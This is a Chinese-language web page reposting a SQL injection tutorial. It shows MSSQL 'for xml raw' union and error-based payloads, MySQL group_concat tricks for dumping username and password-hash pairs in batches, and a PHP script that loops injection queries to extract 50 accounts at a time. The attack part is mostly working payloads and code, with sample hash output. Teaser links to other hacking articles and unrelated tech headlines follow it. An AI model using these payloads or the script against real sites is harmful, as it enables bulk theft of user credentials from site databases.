MSSQL获取哪些数据?MSSQL获取数据的方法是什么?
一、MSSQL获取数据:
用的比较多的就是for xml raw了,MSSQL2000都支持的!
注入中显示数据的两个办法均可以使用,一是union select、二是显错,以MSSQL2005为例:
复制代码
代码如下:
select username from members where 1=2 union select top 3 username from members for xml raw
返回(如果username重复,自动去除重复值):
复制代码
代码如下:
select username from members where 1=(select top 3 username from members for xml raw)
返回:
复制代码
代码如下:
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value '
当数据量很大,无webshell,有注入点可以利用的时候,for xml raw 是不错的获取批量数据的办法!为了不让返回的数据量过大,top可以限制小一点,比如100,另外要附加脚本或者程序对返回值进行处理。
二、MYSQL获取数据:
用的比较多的是group_concat,mysql>=4.1支持该函数,可能很多人知道了,但我看过的文章几乎都是用来读table_name或者column_name的,毕竟表名、列名的数据量不大,所以用起来很方便,可以一下子把所有表名或者所有列名读出来。不过用group_concat批量注入读数据的很少,虽然可以提高效率,增快速度。
因为group_concat有个瓶颈,当group_concat与limit连用时,limit不起作用(也许是先执行group_concat),于是group_concat一次性读出很多条数据(取决于group_concat_max_len,默认1024),而一般网站数据量都是很大的。一旦不能与limit连用,怎么获取之后的数据呢?
其实简单变动下SQL语句即可以实现group_concat与limit连用:
复制代码
代码如下:
select concat(group_concat(A.username separator 0x7c7c7c),0x3a,group_concat(A.password separator 0x7c7c7c)) from (select * from members limit 0,3) A
返回:
guest|||admin|||oldjun:084e0343a0486ff05530df6c705c8bb4|||21232f297a57a5a743894a0e4a801fc3|||ad392a36c512176545900fd05772cbc6
于是简单做下字符串处理,前三条数据就出来了。为了返回不至于数据量过大,单次查询100以下一般可以接受的。
三、给出部分示例代码(mysql group_concat 50条数据每次):
复制代码
代码如下:
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' start end(end: count/50)
Example:
php '.$argv[0].' 0 9999
Author:oldjun(http://www.oldjun.com)
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$start = $argv[1];
$over = $argv[2];
for($i=$start;$i<=$over;$i++){
getdata($i);
}
function getdata($i)
{
$resp = send($i);
if ($resp){
preg_match('#<<<<<<<<<<([^\n]+):([^\n]+)>>>>>>>>>>#', $resp, $value);
if($value){
$namearr=explode("|||",$value[1]);
$passarr=explode("|||",$value[2]);
for($j=0;$j<50;$j++){
echo $namearr[$j]."|||".$passarr[$j]."\r\n";
}
unset($namearr);
unset($passarr);
}else{
echo $resp;
echo "value error,return $i\r\n";
getdata($i);
}
}
else{
echo "resp error,return $i\r\n";
getdata($i);
}
}
function send($i)
{
$limit=$i*50;
//发送数据包代码省略
//注入语句示例:union select 1,2,3,4,CONCAT(0x3C3C3C3C3C3C3C3C3C3C,group_concat(A.username separator 0x7c7c7c),0x3a,group_concat(A.password separator 0x7c7c7c),0x3E3E3E3E3E3E3E3E3E3E) FROM (select * from members limit ".$limit.",50) A#
}
?>
visual foxpro漏洞导致用户访问恶意站点执行任意指令
受影响系统:Microsoft Visual FoxPro 6 0描述:Visual FoxPro是微软发布的数据库开发工具。Visual FoxPro的vfp6r dll ActiveX控件没有正确地验证对foxcommand()或DoCmd()方式的输入参数,如果用户受骗访问了恶意站点的话,就可能导致执行任意指令。厂商
详情2018-02-02 18:41:29责编:llp 来源:驱动管家office漏洞cve-2012-0158的原理和利用方法
下面小编为大家介绍office漏洞CVE-2012-0158就凭借其经典、通用又稳定的漏洞利用经常出现在各种报告中,详细的讲解这个漏洞的原理,以及如何基于原理手动构造出可利用的POC样本。漏洞原理关于本漏洞原理,网上有
详情2018-02-08 18:35:23责编:llp 来源:驱动管家设置wep加密的无线网络密码怎么破解?
近些年无线技术发展迅速,越来越多的用户使用无线设备在自己家建立起无线网络,通过搭建无线网络可以在家里的每个角落使用笔记本和无线网卡访问internet。有很多文章都向大家介绍了无线安全之中的通过设置WEP加密
详情2018-01-13 16:24:37责编:llp 来源:驱动管家手机使用技巧 智能手机怎么用?
1。用智能手机工作室1 1版备份联系人、短信、通话记录等, 下载刷机相关文件(刷机工具, ROM, Radio, 格式化ExtROM工具Repart_DOC exe), 同步软件ActiveSync要用最新版4 0以上的。2。确认下载的ROM文件(n
详情2018-01-04 11:50:01责编:llp 来源:驱动管家Ajax hacking是什么?与传统的xss有什么区别?
在十期发表《Ajax hacking》后,网友给我的反馈中关于XSS技术方面的问题主要由以下几个。为 什么在Ajax hacking中使用XSS?它与传统的XSS又有什么区别?它们各有怎么样的利弊端?大型网站的所 谓XSS漏洞是否
详情2018-03-10 17:07:57责编:llp 来源:驱动管家不想电脑中毒怎么做?用users组用户修改注册表的方法
看了你昨天的留言,我才知道原来木马可以用这么多方式传播呀。那我想问你一件事,常在河边走,哪有不湿鞋,你经常黑别人,难道就没有被别人黑过吗?你是怎么防范其他黑客攻击的呢?就像你说的那样,我也中过木马,
详情2018-02-16 08:50:36责编:llp 来源:驱动管家wordpress下载默认自动更新造成超25%网站被黑
Wordfence最新漏洞造成大部分的网站被黑,Wordfence最近披露了某个影响范围很广的安全问题,大量WordPress网站都受到影响。这个漏洞利用的是WordPress的自动更新功能,此功能默认是开启的,又因为整个互联网上大
详情2018-01-21 21:11:40责编:llp 来源:驱动管家怎么提升服务器安全等级?这里有安全十五招
安全十五招,具体介绍请看下文。1 经常更改系统管理员密码。---->且密码最好是大小写都有2 定期更新系统补丁。---->开启自动更新,并设定到晚上重启。3 检查系统是否多出超级管理员,检查是否有帐号被克隆在“开
详情2018-01-25 15:29:57责编:llp 来源:驱动管家先要用taskList备份系统进程,后用系统自带的工具绞杀病毒
自己亲自动手来用系统自带的工具绞杀病毒比安装的那些软件还要好,那就是利用系统自带命令搞定手工杀毒,具体的步骤如下:一、自己动手前,切记有备无患——用TaskList备份系统进程新型病毒都学会了用进程来隐藏
详情2018-02-12 13:12:55责编:llp 来源:驱动管家抓取哈希值要用什么工具?抓取hash的方法
今天抓hash的时候发现GetHashes exe不好使 另外又测试了几个也都不好用 不同版本的Windows的hash获取方法不一样 用到的工具有pwdump7 exe、GetHashes exe、SAMInside exe、LC5、Cain、Proactive Password Au
详情2018-03-06 12:09:19责编:llp 来源:驱动管家
- 3389远程连接不上有什么原因?对应的解决方法是什么?
- win7系统显卡驱动损坏了的修复方法
- 注册表怎么修改ie浏览器的默认主页
- 凯立德地图包怎么安装使用?安装凯立德地图包的方法介绍
- 电源不知道的事 PC电源应如何去挑选
- GTX1060与RX480哪个好?GTX1060和RX480对比比较
- OPPO公布R15“刘海”功能 提供沉浸式的横屏体验
- 比亚迪发布全新一代的唐SUV 加入燃油版车型
- 电脑因为网络配置出错上不了网的情况怎么处理
- u盘不小心进水了还能用吗?u盘进水正确的处理方法是什么
- 诺基亚8参数 诺基亚8真机图赏
- 黑莓z30真机图片欣赏 黑莓z30好看吗?
- cpu温度高怎么办?解决cpu温度过高的办法
- SSD怎么选?怎么看固态硬盘好坏
- SYN Flood原理是什么?如何诊断和应对SYN Flood?
- 惊险的入侵之旅 利用注射点代码入侵土耳其网站
- 怎样在Win10系统安装DOLBY音效驱动
- 狸窝全能视频转换器制作视频之后怎么加片头
- ae进行渲染生成视频文件的具体方法介绍
- 由于显示器设置过高或者过低导致的电脑黑屏怎么处理